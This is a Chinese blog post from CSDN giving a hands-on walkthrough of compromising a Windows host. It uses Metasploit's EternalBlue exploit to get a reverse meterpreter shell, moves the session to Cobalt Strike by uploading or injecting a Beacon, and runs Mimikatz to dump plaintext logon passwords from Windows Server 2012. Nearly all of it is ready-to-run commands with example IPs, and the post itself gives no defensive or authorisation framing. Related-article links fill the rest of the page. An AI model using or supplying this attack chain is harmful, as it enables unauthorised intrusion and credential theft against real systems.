cs与msf权限传递,以及mimikatz抓取win2012明文密码

于 2024-06-27 11:10:21 发布
阅读量392 收藏 9
点赞数 5
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76207585/article/details/140008435
版权

Cobalt Strike与Metasploit Framework权限传递

Cobalt Strike和Metasploit Framework可以通过以下步骤进行权限传递:

  1. 建立会话:

    • 在Metasploit中使用漏洞利用模块(exploit)获取目标系统的会话(session)。
      例如:
      use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
run

  2. 会话转移到Cobalt Strike:
    在Metasploit中获取会话后,可以通过以下步骤转移该会话到Cobalt Strike:
    在Cobalt Strike中生成一个反向TCP Beacon Payload。
    在Metasploit中使用meterpreter会话,将Cobalt Strike生成的Payload注入到目标系统中以建立Cobalt Strike Beacon。

    meterpreter> upload <cobalt_strike_beacon_payload>
meterpreter> execute -f <cobalt_strike_beacon_payload>

    或者直接通过psinject模块将Cobalt Strike的Beacon注入到运行的进程中。

    meterpreter> psinject <pid> <cobalt_strike_beacon_payload>

使用Mimikatz抓取Windows Server 2012明文密码

Mimikatz是一个强大的工具,可以在Windows系统上提取明文密码、哈希、PIN码等。以下是在Windows Server 2012上使用Mimikatz抓取明文密码的步骤:

  1. 获取系统权限:
    首先,确保你在目标系统上具有管理员权限或SYSTEM权限。

  2. 下载并运行Mimikatz:
    将Mimikatz上传到目标系统并使用管理员权限执行它。

    meterpreter> upload mimikatz.exe
meterpreter> execute -f mimikatz.exe -i

  3. Dump密码:
    在Mimikatz命令行中,使用以下命令抓取明文密码:

    privilege::debug
sekurlsa::logonpasswords

示例操作

假设我们已经使用Metasploit获取了目标系统的Meterpreter会话,并且需要将会话转移到Cobalt Strike,然后使用Mimikatz抓取明文密码。

  1. 在Metasploit中获取会话:

    msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.200
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

  2. 将会话转移到Cobalt Strike:
    在Cobalt Strike中生成Beacon Payload。
    上传并执行Payload,实现会话转移。

  3. 使用Mimikatz抓取明文密码:
    在Cobalt Strike的Beacon中,上传并执行Mimikatz。

    beacon> upload mimikatz.exe
beacon> shell mimikatz.exe
    • 在Mimikatz中执行抓取密码的命令:
      mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
_Sethos
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,通过Web传递的方式获取靶机权限。以下是详细的知识点解析: 1. **Metasploit框架**:Metasploit是一款开源的安全漏洞检测工具,它包含了大量的漏洞...
通信与网络中的MSF基于组件的业务框架
11-14
MSF业务框架的目标是通过明确的接口定义,促进组件间以及组件与代理之间的松耦合,从而提高业务的可维护性和可扩展性。这种架构允许开发人员专注于单个组件的功能,同时确保整体业务流程的顺畅。此外,通过解耦,...
基础电子中的MSF业务框架与IMS的关系
11-14
MSF(Method for System Specification and Development,系统规范与开发方法)是一种在电信行业中广泛采用的业务框架,它旨在提供一个高效、结构化的开发过程,以适应不断变化的市场需求和技术创新。MSF的核心是...
Msf攻击Win7
07-09
总的来说,Msf攻击Win7涉及到的信息安全实践包括:漏洞扫描(使用Nessus)、漏洞利用(使用Metasploit)以及对目标系统的远程控制。在整个过程中,安全测试者必须遵守合法授权和道德规范,仅用于合法的测试目的。
通信与网络中的MSF250的DS1/E1信号格式
12-10
MSF250是一种多业务成帧芯片,其主要功能在于处理通信网络中的DS1/E1信号格式。DS1(T1)和E1(欧洲的T1版本)是数字语音和数据通信的标准,通常用于将多个较低速率的信号(如DS0,每个24kbps)复用成更高速率的链路...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
01-24
此外,鉴于KITTI数据集本身的缺陷,以及跑MSF的需要等原因,要想完整跑出理想MSF效果,需要KITTI数据预处理、MSF源码修改,GPS加噪声(可选),ORBSLAM2的publish位姿的话题(topic),轨迹显示等各项操作,不过我...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,...与具有固定框架的方法相反,MSF提供了一个可以伸缩的灵活框架,以满足任何规模的组织或者项目开发团队的需要。MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
linux系统安装msf的过程详解
09-14
总结,安装Linux上的Metasploit Framework需要下载安装脚本,解决依赖问题,创建用户并设置权限,以及了解如何使用MSF的命令行工具。通过这些步骤,你可以顺利地在Linux环境中搭建起MSF环境,进行安全测试和研究。...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
无人驾驶算法学习:多传感器融合MSF算法
01-28
通过编译和运行该库,可以直观地理解MSF算法的工作流程,包括如何调用预测和更新函数,以及如何处理不同传感器的数据。 总的来说,多传感器融合MSF算法在无人驾驶领域具有重要意义,它能够结合多种传感器的优势,...
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
09-15
MSF 配置自定义 Payload 控制目标主机权限 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,它提供了一个强大的框架来评估和模拟攻击各种类型的系统和网络。MSF 的 exploit 模块下是支持 set ...
第九十七课:msf配置自定义payload控制目标主机权限1
08-03
对于特定情况,如添加用户或执行一次性的任务,如下载文件、抓取明文密码等,可以使用自定义payload。例如,`windows/adduser` payload可以创建一个新的用户,配合自定义的可执行文件实现特定功能。 总的来说,理解...
Microsoft解决方案框架—MSF项目管理准则v.1.1
03-03
本白皮书描述了这种分布式小组方法的原理,并解释了项目经理与MSF小组模型之间的关系。尽管项目管理对于小型项目也很重要,但是本白皮书把重点放在具有扩展小组的大型项目上。虽然本文没有涉及到项目管理领域的所有...
outlook密码抓取
02-23
标题“Outlook密码抓取”涉及的是一个与Microsoft Outlook相关的技术话题,主要集中在如何通过命令行界面获取Outlook账户的密码。Outlook是一款广泛使用的电子邮件客户端,它存储用户的登录凭证以便于自动连接到邮件...
74-74.渗透测试-MSF核心模块.mp4
最新发布
05-10
74-74.渗透测试-MSF核心模块.mp4
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
73-73.渗透测试-MSF目录结构.mp4
05-10
73-73.渗透测试-MSF目录结构.mp4
内网MSF基础:PostgreSQL配置与权限管理教程
本篇文章主要介绍了在内网环境中使用Metasploit Framework (MSF)进行基础操作和配置的过程。MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值